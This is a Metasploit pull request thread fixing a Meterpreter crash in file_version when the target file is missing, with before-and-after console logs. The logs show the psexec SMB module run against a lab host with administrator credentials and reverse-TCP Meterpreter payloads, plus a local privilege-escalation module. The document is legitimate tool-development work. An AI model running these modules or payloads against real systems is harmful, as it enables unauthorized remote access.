Fixes crash in meterp when file_version asks for a file that doesn't exist

[smashery]

This PR fixes a crash in the file_version method for Windows meterpreter.

If the file in question doesn't exist, the program crashes. I came across this when testing windows/local/ms15_078_atmfd_bof on various OSes (beyond what is officially supported), which fails on Server 2022, since atmfd.dll is not present. So, haven't found a specific place where it's a problem - but certainly you could envisage:

• Bad assumptions about a file being on a certain OS (e.g. deleted, removed in a later version)
• Race conditions (deleted after checking for existence)

msf6 exploit(multi/handler) > use windows/local/ms15_078_atmfd_bof
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms15_078_atmfd_bof) > set session 1
session => 1
msf6 exploit(windows/local/ms15_078_atmfd_bof) > check
[*] 20.211.33.250 - Meterpreter session 1 closed.  Reason: Died

The root cause is that railgun's GetFileVersionInfoSizeA returns 0 (error condition). Then VirtualAlloc, which is now asked for a size of 0, returns 0 itself. Eventually VerQueryValueA tries to fill a NULL buffer, and I presume it's an access violation at that point.

The fix is just to check for the GetFileVersionInfoA error condition, and bug out early.

Verification

We can test this using the interactive ruby shell:

• Open a meterpreter session
• use windows/local/ms15_078_atmfd_bof
• set session <id>
• irb to open the interactive shell
• file_version('asdf')
• Should return nil (not crash the shell)

[gwillcox-r7]

Before

msf6 exploit(windows/smb/ms17_010_psexec) > use exploit/windows/smb/psexec
show o[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                                 yes       The target host(s), see https://github.com/rapid7/metasploit
                                                    -framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listi
                                                    ng
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass                                no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,..
                                                    .) or a normal read/write folder share
   SMBUser                                no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.30.107.195   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > set username normal
username => normal
msf6 exploit(windows/smb/psexec) > set password normaluser
password => normaluser
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                                 yes       The target host(s), see https://github.com/rapid7/metasploit
                                                    -framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listi
                                                    ng
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               normaluser       no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,..
                                                    .) or a normal read/write folder share
   SMBUser               normal           no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.30.107.195   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/psexec) > set SMBDOMAIN DAFOREST
SMBDOMAIN => DAFOREST
msf6 exploit(windows/smb/psexec) > run

[-] Msf::OptionValidateError The following options failed to validate: RHOSTS
msf6 exploit(windows/smb/psexec) > set RHOSTS 172.30.97.103
RHOSTS => 172.30.97.103
msf6 exploit(windows/smb/psexec) > run

[*] Started reverse TCP handler on 172.30.107.195:4444 
[*] 172.30.97.103:445 - Connecting to the server...
[*] 172.30.97.103:445 - Authenticating to 172.30.97.103:445|DAFOREST as user 'normal'...
[*] 172.30.97.103:445 - Selecting PowerShell target
[*] 172.30.97.103:445 - Executing the payload...
[-] 172.30.97.103:445 - ERROR_ACCESS_DENIED opening the Service Manager
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/psexec) > set username Administrator
username => Administrator
msf6 exploit(windows/smb/psexec) > set password theAdmin123
password => theAdmin123
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                172.30.97.103    yes       The target host(s), see https://github.com/rapid7/metasploit
                                                    -framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listi
                                                    ng
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             DAFOREST         no        The Windows domain to use for authentication
   SMBPass               theAdmin123      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,..
                                                    .) or a normal read/write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.30.107.195   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms15_078_atmfd_bof) > set SESSION 1
SESSION => 1                        
msf6 exploit(windows/local/ms15_078_atmfd_bof) > irb
[*] Starting IRB shell...           
[*] You are in exploit/windows/local/ms15_078_atmfd_bof
                                    
irb: warn: can't alias ls from irb_ls.
>> file_version('asdf')
[*] 172.30.97.103 - Meterpreter session 1 closed.  Reason: Died

After

msf6 > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set username Administrator
username => Administrator
msf6 exploit(windows/smb/psexec) > set password theAdmin123
password => theAdmin123
msf6 exploit(windows/smb/psexec) > set RHOSTS 172.30.97.103
RHOSTS => 172.30.97.103
msf6 exploit(windows/smb/psexec) > show options

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                172.30.97.103    yes       The target host(s), see https://github.com/rapid7/metasploit
                                                    -framework/wiki/Using-Metasploit
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to to be used on target for pretty listi
                                                    ng
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             .                no        The Windows domain to use for authentication
   SMBPass               theAdmin123      no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,..
                                                    .) or a normal read/write folder share
   SMBUser               Administrator    no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.30.107.195   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/ms15_078_atmfd_bof) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/ms15_078_atmfd_bof) > irb
[*] Starting IRB shell...
[*] You are in exploit/windows/local/ms15_078_atmfd_bof

irb: warn: can't alias ls from irb_ls.
>> file_version('asdf')
=> nil
>> file_version('add')
=> nil
>> 

[gwillcox-r7]

LGTM t hanks for making this fix @smashery!

[gwillcox-r7]

Release notes

A bug has been fixed in the file_version method for Windows Meterpreter, which would cause the session to crash if it was run on a file that did not exist on the target system.